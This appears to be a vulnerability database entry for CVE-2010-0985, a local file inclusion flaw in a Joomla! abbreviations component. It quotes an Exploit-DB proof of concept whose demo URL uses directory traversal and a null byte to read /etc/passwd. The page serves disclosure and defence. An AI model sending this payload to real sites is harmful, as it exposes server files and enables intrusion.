CVE-2010-0985
Description
Directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. NOTE: some of these details are obtained from third party information.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Joomla! Component com_abbrev - Local File Inclusion
<------------------- header data start ------------------- >
[++] Joomla Component com_abbrev Local File Inclusion Vulnerability
[++] author : FL0RiX
[++] Name : com_abbrev
[++] Bug Type : Local File Inclusion
[++] Demo Vuln. :
[++] http://server/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00
[++] Note : LFI/RFI Uzmanı Zannedenler Localda Aramazlar :)
< ------------------- header data end of ------------------- >
< -- bug code start -- >
path/index.php?option=com_abbrev&controller=[-LFI-]
< -- bug code end of -- >
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| chris_simon | com_abbrev | 1.1 | |
| joomla | joomla\! | | |
References
- http://osvdb.org/61458
- http://secunia.com/advisories/37834
- http://www.exploit-db.com/exploits/10948
- http://www.securityfocus.com/bid/37560
- https://exchange.xforce.ibmcloud.com/vulnerabilities/55348
- http://osvdb.org/61458
- http://secunia.com/advisories/37834
- http://www.exploit-db.com/exploits/10948
- http://www.securityfocus.com/bid/37560
- https://exchange.xforce.ibmcloud.com/vulnerabilities/55348
CWEs
CWE-22
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.